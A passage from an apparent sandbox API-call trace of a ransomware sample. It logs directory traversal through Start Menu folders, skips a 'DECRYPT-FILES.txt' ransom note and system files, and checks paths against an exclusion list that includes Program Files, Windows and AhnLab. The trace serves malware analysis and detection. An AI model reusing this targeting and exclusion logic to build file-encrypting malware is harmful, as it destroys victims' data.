cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.434] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.434] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.434] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.434] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.434] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.434] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0182.434] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.434] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0182.434] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\0a16c9.tmp" [0182.434] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.434] CloseHandle (hObject=0x0) returned 0 [0182.434] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.435] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.435] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.435] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.435] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.435] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.435] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.435] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.435] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0182.435] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0182.435] CloseHandle (hObject=0x284) returned 1 [0182.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.436] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.436] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.436] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.436] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.436] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="autorun.inf") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="boot.ini") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="desktop.ini") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="iconcache.db") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="bootsect.bak") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat.log") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="thumbs.db") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="Bootfont.bin") returned 1 [0182.436] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0182.436] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0182.436] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0182.436] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0182.436] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0182.437] lstrcmpW (lpString1="Maintenance", lpString2=".") returned 1 [0182.437] lstrcmpW (lpString1="Maintenance", lpString2="..") returned 1 [0182.437] lstrcatW (in: lpString1="Maintenance", lpString2="\\" | out: lpString1="Maintenance\\") returned="Maintenance\\" [0182.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Maintenance\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Program Files") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch=":\\Windows") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Games\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\All Users") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="AhnLab") returned 0x0 [0182.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.437] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0182.437] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.437] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\0a16c9.tmp") returned 107 [0182.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0182.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0182.438] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.438] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt") returned 114 [0182.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0182.438] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0182.438] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0182.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.438] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.438] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc42dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.438] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.438] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.438] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.438] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.438] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.438] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0182.439] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.439] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0182.439] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\0a16c9.tmp" [0182.439] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.439] CloseHandle (hObject=0x0) returned 0 [0182.439] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.439] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.439] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.439] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0182.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0182.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0182.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0182.439] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0182.439] lstrcmpiW (lpString1="Help.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="autorun.inf") returned 1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="boot.ini") returned 1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="desktop.ini") returned 1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat") returned -1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="iconcache.db") returned -1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="bootsect.bak") returned 1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat.log") returned -1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="thumbs.db") returned -1 [0182.440] lstrcmpiW (lpString1="Help.lnk", lpString2="Bootfont.bin") returned 1 [0182.440] lstrlenW (lpString="Help.lnk") returned 8 [0182.440] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.440] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 0 [0182.440] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0182.440] CloseHandle (hObject=0x284) returned 1 [0182.440] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0182.440] lstrcmpW (lpString1="Startup", lpString2=".") returned 1 [0182.440] lstrcmpW (lpString1="Startup", lpString2="..") returned 1 [0182.440] lstrcatW (in: lpString1="Startup", lpString2="\\" | out: lpString1="Startup\\") returned="Startup\\" [0182.440] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 